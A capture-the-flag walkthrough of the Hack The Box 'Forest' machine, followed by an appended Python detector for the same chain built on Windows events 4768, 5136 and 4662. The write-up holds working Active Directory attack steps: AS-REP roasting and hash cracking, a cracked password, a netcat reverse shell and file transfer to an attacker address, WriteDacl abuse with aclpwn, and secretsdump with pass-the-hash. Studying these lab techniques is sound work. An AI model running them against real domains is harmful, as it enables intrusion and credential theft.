
Hackthebox Forest Walkthrough


In this article you will learn the following:

  • Scanning targets using nmap
  • Enumerating a Windows machine
  • AS-REP roasting attack on valid users
  • Cracking krb5asrep hashes with hashcat
  • Enumerating Active Directory via SharpHound
  • Showing the results in the BloodHound tool
  • Attacking WriteDacl
  • Stealing user hashes (LM:NT)

Nmap Scanning:


Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161


Enumeration:
– I started enumerating users using enum4linux:
enum4linux -a 10.10.10.161
– Then I enumerated users using rpcclient:

After enumerating the users, and since the Kerberos port is open, I ran the GetNPUsers.py script from
the Impacket suite:
python GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile users.txt -outputfile hashes2.txt -format hashcat

I got the hashed password for user svc-alfresco:

To crack this hashed password I used hashcat as follows:

hashcat -m 18200 --force -a 0 hashes2.txt rockyou.txt

And now I have valid credentials: svc-alfresco:s3rvice

I ran smbmap to see the shared folder permissions; nothing interesting.

Then I connected to the server using evil-winrm with these valid credentials and got the user flag:

I started enumerating Active Directory after I got a reverse shell and executed powershell.exe:

python -m SimpleHTTPServer 80

Invoke-WebRequest -Uri http://10.10.14.42/nc64.exe -OutFile "C:\m4rv3l\nc64.exe"
./nc64.exe 10.10.14.42 9091 -e powershell.exe

Installing SharpHound:

Invoke-WebRequest -Uri http://10.10.14.42/SharpHound.ps1 -OutFile "C:\m4rv3l\SharpHound.ps1"

Execute SharpHound:

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -JSONFolder "c:\experiments\bloodhound"

Moving it via nc64:

nc -lvp 9092 > 20200321052509_BloodHound.zip

.\nc64.exe 10.10.14.42 9092 < 20200321052509_BloodHound.zip

NOTE: Run cmd.exe to do that.

After getting the .zip file from the box, I ran the BloodHound tool and searched for a path to administrator:

The BloodHound result shows svc-alfresco can WriteDacl to HTB.local, which contains [email protected]

A good resource for understanding the attack:
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

Tool:

pip install aclpwn
aclpwn -f svc-alfresco -ft user -d htb.local -s 10.10.10.161
choosing path 0

python secretsdump.py htb.local/svc-alfresco:[email protected]

Then I connected as administrator with the NT hash via the evil-winrm tool and got root.txt
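
Added example (not part of the original walkthrough): a defender's view of this chain, as a small Python detector over Windows Security events 4768 (TGT issued without pre-authentication), 5136 (nTSecurityDescriptor changed on the domain root) and 4662 (replication rights exercised by a non-machine account). It assumes the events are already parsed into dicts keyed by the standard event field names; the sample events, DC01$ and alice are constructed for illustration.

```python
import re

# Control-access right GUIDs that together permit directory replication.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
REPL_GUIDS = {GET_CHANGES, GET_CHANGES_ALL}

# Constructed sample events (not real logs); DC01$ and alice are made-up names.
SAMPLE_EVENTS = [
    {"id": 4768, "TargetUserName": "alice", "PreAuthType": "2"},
    {"id": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0"},
    {"id": 5136, "SubjectUserName": "svc-alfresco", "ObjectDN": "DC=htb,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"id": 4662, "SubjectUserName": "DC01$", "Properties": "{" + GET_CHANGES + "}"},
    {"id": 4662, "SubjectUserName": "svc-alfresco", "Properties": "{" + GET_CHANGES_ALL.upper() + "}"},
]

def is_domain_root(dn):
    """True when the DN has only DC= components, e.g. DC=htb,DC=local."""
    parts = [p.strip().upper() for p in dn.split(",") if p.strip()]
    return bool(parts) and all(p.startswith("DC=") for p in parts)

def detect(events):
    """Return (rule, account) findings; machine accounts (name$) are skipped."""
    findings = []
    for ev in events:
        eid = ev.get("id")
        user = (ev.get("TargetUserName") or ev.get("SubjectUserName") or "").lower()
        if not user or user.endswith("$"):
            continue
        if eid == 4768 and ev.get("PreAuthType") == "0":
            findings.append(("tgt-without-preauth", user))
        elif (eid == 5136 and is_domain_root(ev.get("ObjectDN", ""))
              and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            findings.append(("domain-dacl-modified", user))
        elif eid == 4662:
            guids = set(re.findall(r"\{([0-9a-f-]{36})\}", ev.get("Properties", "").lower()))
            if guids & REPL_GUIDS:
                findings.append(("replication-by-non-dc", user))
    return findings

def full_chain_accounts(findings):
    """Accounts that triggered all three rules, i.e. the whole sequence above."""
    rules = {}
    for rule, user in findings:
        rules.setdefault(user, set()).add(rule)
    return sorted(u for u, r in rules.items() if len(r) == 3)

if __name__ == "__main__":
    print(full_chain_accounts(detect(SAMPLE_EVENTS)))
```

Skipping every account ending in $ is a simplification: in a real domain, compare against an explicit list of domain controllers and approved replication service accounts instead.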

That’s all folks 😀
